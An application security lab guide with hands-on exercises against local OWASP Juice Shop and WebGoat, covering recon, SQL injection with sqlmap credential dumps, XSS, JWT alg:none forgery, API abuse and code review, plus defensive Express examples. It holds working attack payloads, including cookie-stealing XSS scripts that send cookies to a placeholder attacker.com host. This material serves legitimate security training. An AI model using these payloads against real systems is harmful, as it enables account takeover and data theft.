Application Security Lab
This lab provides practical experience with application security testing. You will work through exercises targeting real vulnerabilities in a deliberately vulnerable application.
Setup
```bash
# Option 1: OWASP Juice Shop (local Docker)
docker pull bkimminich/juice-shop
docker run -d -p 3000:3000 bkimminich/juice-shop
# Open http://localhost:3000

# Option 2: OWASP WebGoat (local)
docker pull webgoat/goatandwolf
docker run -d -p 8080:8080 -p 9090:9090 webgoat/goatandwolf
# Open http://localhost:8080/WebGoat

# Install tools
sudo apt install -y sqlmap nmap curl jq
pip install requests flask flask-wtf pyjwt   # pyjwt is needed by the Exercise 4 script
npm install -g jwt-cli
```
Exercise 1: Reconnaissance
Objective
Discover the attack surface of the target application.
```bash
# 1. Enumerate endpoints
curl -s http://localhost:3000/api/ | jq '.'

# 2. Directory brute-forcing with common paths
for path in admin api assets backup config debug docs graphql health login logout robots swagger test; do
  status=$(curl -s -o /dev/null -w "%{http_code}" "http://localhost:3000/$path")
  echo "GET /$path → HTTP $status"
done

# 3. Check security headers
curl -s -I http://localhost:3000 | grep -iE "x-frame|x-content|x-xss|strict|csp|hsts"

# 4. Extract JavaScript files for endpoint discovery
curl -s http://localhost:3000 | grep -oP 'src="[^"]+"' | sort -u
```
Questions
- What endpoints did you discover?
- What security headers are missing?
- What information can you gather from JavaScript files?
Exercise 2: SQL Injection
Objective
Extract data from the database using SQL injection.
```bash
# 1. Test login form with SQL injection
# (double-quoted body so the single quote in the payload reaches the server intact)
curl -X POST http://localhost:3000/rest/user/login \
  -H "Content-Type: application/json" \
  -d "{\"email\": \"' OR 1=1 --\", \"password\": \"anything\"}"

# 2. If that doesn't work, try these payloads
# ' OR '1'='1
# admin@test.com' --
# ' UNION SELECT 1,2,3,4,5,6 --
# '; WAITFOR DELAY '00:00:05' --
# ' AND SLEEP(5) --

# 3. Use sqlmap for automated exploitation
sqlmap -u "http://localhost:3000/rest/products/search?q=test" --batch
sqlmap -u "http://localhost:3000/rest/products/search?q=test" --dbs
sqlmap -u "http://localhost:3000/rest/products/search?q=test" -D juice_shop --tables
sqlmap -u "http://localhost:3000/rest/products/search?q=test" -D juice_shop -T Users --dump
```
Deliverable
- Extracted user credentials (email + password hash)
- Password hash cracking attempt with hashcat
- SQLi payload that worked and why
Exercise 3: Cross-Site Scripting (XSS)
Objective
Inject and execute JavaScript payloads.
```bash
# 1. Test search field for reflected XSS
curl "http://localhost:3000/?q=<script>alert(1)</script>"

# 2. If blocked, try:
# <img src=x onerror=alert(1)>
# <svg onload=alert(1)>
# "><script>alert(1)</script>
# <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

# 3. Test comment/review form for stored XSS
curl -X POST http://localhost:3000/api/Reviews \
  -H "Content-Type: application/json" \
  -d '{"productId": 1, "message": "<script>alert(document.cookie)</script>"}'

# 4. Craft XSS payload that steals cookies
cat > steal_cookie.js << 'JS'
<script>
  fetch('https://attacker.com/collect?cookie=' + document.cookie + '&page=' + encodeURIComponent(document.location.href))
</script>
JS
```
Deliverable
- One working reflected XSS payload
- One working stored XSS payload
- Explanation of why the payload executed (what encoding was missing)
Exercise 4: JWT Attacks
Objective
Exploit weaknesses in JWT authentication.
```bash
# 1. Log in and capture the JWT
TOKEN=$(curl -s -X POST http://localhost:3000/rest/user/login \
  -H "Content-Type: application/json" \
  -d '{"email":"test@test.com","password":"test123"}' | jq -r '.authentication.token')
echo "Token: $TOKEN"

# 2. Decode the JWT (Base64 decode). Segments are base64url without padding,
# so map the alphabet back and pad them before base64 -d will accept them.
b64url_decode() {
  local s; s=$(tr '_-' '/+')
  while [ $(( ${#s} % 4 )) -ne 0 ]; do s="$s="; done
  printf '%s' "$s" | base64 -d; echo
}
echo "$TOKEN" | cut -d. -f2 | b64url_decode   # Payload
echo "$TOKEN" | cut -d. -f1 | b64url_decode   # Header

# 3. Check the algorithm
echo "$TOKEN" | jwt decode -

# 4. Try algorithm confusion attack (alg:none)
python3 << 'PYEOF'
import jwt  # PyJWT

# Try "none" algorithm: an unsigned token carrying admin claims. This only
# shows whether the library will mint one; whether the application accepts
# it has to be checked by sending it in the Authorization header.
payload = {"email": "admin@juice-sh.op", "iat": 1516239022}
try:
    token = jwt.encode(payload, key="", algorithm="none")
    print(f"alg=none token: {token}")
except Exception as e:
    print(f"alg=none attack blocked: {e}")
PYEOF
```
Deliverable
- Decoded JWT showing header, payload, and signature
- If vulnerable, forged admin token
- Analysis of JWT security measures
Exercise 5: API Security Testing
Objective
Find API vulnerabilities including BOLA, mass assignment, and excessive data exposure.
```bash
# 1. BOLA test — try to access another user's data
curl -s http://localhost:3000/rest/user/2   # Try different user IDs
curl -s "http://localhost:3000/api/Orders/1?userId=2"

# 2. Mass assignment — try to escalate privileges
curl -X PATCH http://localhost:3000/rest/user/1 \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"role": "admin"}'   # Try adding unexpected fields

# 3. Excessive data exposure
curl -s http://localhost:3000/rest/user/1 | jq '.'

# 4. Rate limit testing
for i in {1..100}; do
  curl -s -o /dev/null -w "%{http_code}\n" \
    -X POST http://localhost:3000/rest/user/login \
    -H "Content-Type: application/json" \
    -d '{"email":"test@test.com","password":"wrong'$i'"}'
done | sort | uniq -c
```
Deliverable
- BOLA vulnerability (accessing another user’s data)
- Mass assignment vulnerability (if found)
- Rate limiting analysis (how many requests before blocking?)
- Excessive data exposure findings
Exercise 6: Secure Code Review
Objective
Identify vulnerabilities in source code.
```bash
# Clone Juice Shop source
git clone https://github.com/juice-shop/juice-shop.git
cd juice-shop

# Search for common vulnerability patterns
echo "=== SQLi patterns (string concatenation) ==="
grep -rnE '\$\{.*query' --include="*.ts" --include="*.js" | head -10

echo ""
echo "=== XSS patterns (innerHTML) ==="
grep -rn "innerHTML" --include="*.ts" --include="*.js" | head -10

echo ""
echo "=== Hardcoded secrets ==="
grep -rni "password" --include="*.ts" --include="*.js" | grep -v test | grep -v node_modules | head -20

echo ""
echo "=== Insecure crypto ==="
grep -rniw "MD5\|SHA1\|DES\|RC4" --include="*.ts" --include="*.js" | head -10
```
Code Review Checklist
Check each file for:
- SQL injection: String concatenation in database queries
- XSS: innerHTML, dangerouslySetInnerHTML, v-html
- Broken auth: Missing authentication check on endpoints
- Broken access control: No ownership verification
- Secrets: Hardcoded API keys, passwords, tokens
- Insecure crypto: Weak algorithms, static IVs
- Mass assignment: req.body directly to database
- Path traversal: User input in file paths
Deliverable
- At least 5 vulnerabilities identified in code review
- For each: file, line number, vulnerability type, fix recommendation
- Pull request with fixes for the most critical issue
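The server-side checks whose absence Exercise 5 probes and the code review checklist looks for (ownership verification, mass assignment, excessive data exposure, login rate limiting), as an added example that is not Juice Shop code: pure functions an Express handler would call with req.user, req.params.id and req.body. The writable field names and the limits are assumed values.

```javascript
// Added example (not Juice Shop code): the checks a handler such as
// PATCH /rest/user/:id should run. Field names and limits are assumed values.

// Mass assignment fix: only an explicit allowlist of fields reaches the
// database, so {"role": "admin"} in the body is silently dropped.
const USER_WRITABLE = new Set(['username', 'profileImage']);

function pickWritable(body) {
  const update = {};
  for (const [key, value] of Object.entries(body || {})) {
    if (USER_WRITABLE.has(key)) update[key] = value;
  }
  return update;
}

// Broken access control (BOLA) fix: the caller must own the record or be an
// admin. Returns an HTTP-style result the handler can send as-is.
function authorizeUserUpdate(authUser, targetId, body) {
  if (!authUser) return { status: 401, error: 'authentication required' };
  const owner = String(authUser.id) === String(targetId);
  if (!owner && authUser.role !== 'admin') return { status: 403, error: 'not your record' };
  return { status: 200, update: pickWritable(body) };
}

// Excessive data exposure fix: a response view that never includes the
// password hash or other internal columns, whatever the database row contains.
function publicUserView(row) {
  return { id: row.id, email: row.email, username: row.username };
}

// Login rate limit (fixed window per client key, e.g. ip + email): answers the
// Exercise 5 question of how many attempts go through before blocking.
class LoginLimiter {
  constructor(maxAttempts = 5, windowMs = 60000) {
    this.max = maxAttempts; this.windowMs = windowMs; this.windows = new Map();
  }
  allow(key, now = Date.now()) {
    const w = this.windows.get(key);
    if (!w || now - w.start >= this.windowMs) {
      this.windows.set(key, { start: now, count: 1 });
      return true;
    }
    w.count += 1;
    return w.count <= this.max;
  }
}
```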
Lab Completion Checklist
- Exercise 1: Application recon complete (endpoints, headers, JS analysis)
- Exercise 2: SQL injection working — data extracted and cracked
- Exercise 3: Reflected and stored XSS working
- Exercise 4: JWT decoded, alg:none attack tested
- Exercise 5: API vulnerabilities documented (BOLA, mass assignment, rate limiting)
- Exercise 6: Code review findings with fix recommendations
- All results documented with payloads, commands, and screenshots